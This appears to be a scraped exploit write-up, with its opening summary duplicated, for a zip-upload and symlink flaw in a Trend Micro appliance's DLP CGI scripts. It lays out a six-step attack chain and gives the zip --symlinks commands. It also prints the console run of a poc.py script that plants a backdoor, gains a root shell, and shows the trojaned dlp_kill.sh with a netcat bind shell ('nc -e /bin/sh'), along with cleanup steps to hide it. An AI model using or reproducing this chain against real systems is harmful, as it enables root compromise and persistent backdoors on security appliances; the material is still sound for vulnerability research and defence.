VULHUB ™

### Summary: The vulnerabity is that the dlp_policy_upload.cgi allows the upload of a zip file, located statically as: /var/dlp_policy.zip. The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations: ``` - /eng_ptn_stores/prod/sensorSDK/data/ - /eng_ptn_stores/prod/sensorSDK/backup_pol/ ``` We can then use symlinks to craft a symlinked that points to /opt/TrendMicro/MinorityReport/bin/ ls -la /eng_ptn_stores/prod/sensorSDK/data/si lrwxrwxrwx 1 root root 35 Sep 3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed... ### Notes: - For this particular PoC, all I did was exec a bind shell using netcat showing that there is no firewall protections... - Auth is bypassed in an alternate poc, so we can attack this with the default password... ### Exploitation This is a clever trick,...

### Summary: The vulnerabity is that the dlp_policy_upload.cgi allows the upload of a zip file, located statically as: /var/dlp_policy.zip. The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations: ``` - /eng_ptn_stores/prod/sensorSDK/data/ - /eng_ptn_stores/prod/sensorSDK/backup_pol/ ``` We can then use symlinks to craft a symlinked that points to /opt/TrendMicro/MinorityReport/bin/ ls -la /eng_ptn_stores/prod/sensorSDK/data/si lrwxrwxrwx 1 root root 35 Sep 3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/ Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed... ### Notes: - For this particular PoC, all I did was exec a bind shell using netcat showing that there is no firewall protections... - Auth is bypassed in an alternate poc, so we can attack this with the default password... ### Exploitation This is a clever trick, basically, we cant traverse since unzip checks for ../ (even though spec says its ok). We can still exploit this however by extracting a symlink to say a directory and then write into that directory. For example, if you wanted to link to /tmp you would ``` ln -s /tmp/ pwn zip --symlinks -r foo.zip pwn ``` Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk. All we need todo now is create another zip file with the folder and file... ``` zip -r foo.zip pwn/hax.txt ``` Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python. So, in summary, the steps to attack this target are: 1. Bypass the auth via XXXX 2. upload a zip with a symlink 3. trigger extraction, crafting the malicious symlink 4. upload another zip with the malicious dlp_kill.sh file 5. trigger extraction, the symlink fires and crushs /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh 6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi Greetz to the busticati, you know who you are. My home boys. ``` saturn:~ mr_me$ ./poc.py (+) usage: ./poc.py <target> <pass> (+) eg: ./poc.py 172.16.175.123 admin saturn:~ mr_me$ ./poc.py 172.16.175.123 admin123 (+) logged into the target... (+) performing initial preflight attack...! (+) uploading the zipped symlink... (+) successfuly uploaded the zipped symlink (+) extracting the symlink... (+) extracted the symlink! (+) uploading the zipped dlp_kill.sh... (+) successfuly uploaded the zipped log_cache.sh (+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/... (+) extracted the dlp_kill.sh file! (+) starting backdoor... (+) backdoor started ! (+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh ! (+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh id uid=0(root) gid=0(root) uname -a Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh #!/bin/sh kill `pidof sensorworker sensormain` for i in `seq 0 4`; do sleep 1; sid=`pidof sensormain` if [ "$sid" -eq "" ]; then break else if [ $i -eq 4 ]; then kill -9 $sid fi fi done `nc -e /bin/sh -lp 2122>/dev/null` sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh #!/bin/sh kill `pidof sensorworker sensormain` for i in `seq 0 4`; do sleep 1; sid=`pidof sensormain` if [ "$sid" -eq "" ]; then break else if [ $i -eq 4 ]; then kill -9 $sid fi fi done exit ```